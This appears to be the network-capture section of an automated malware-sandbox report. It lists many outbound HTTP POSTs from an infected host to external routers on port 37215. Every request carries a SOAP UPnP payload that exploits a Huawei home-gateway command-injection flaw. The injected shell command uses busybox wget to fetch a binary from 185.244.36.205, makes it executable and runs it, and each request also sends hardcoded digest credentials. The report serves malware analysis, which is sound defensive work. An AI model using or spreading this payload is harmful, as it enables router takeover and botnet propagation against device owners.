                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              933192.168.2.1546918190.134.38.3037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539696932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              934192.168.2.1559116195.76.43.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539696932 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              935192.168.2.1559390121.138.226.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539710999 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              936192.168.2.156011631.186.238.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539741993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              937192.168.2.1558846102.57.103.11837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539742947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              938192.168.2.1546956186.45.101.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539764881 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              939192.168.2.1539598186.58.163.11237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539778948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              940192.168.2.1552516190.115.154.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539815903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              941192.168.2.153408631.234.148.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539840937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              942192.168.2.1542040186.175.112.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539846897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
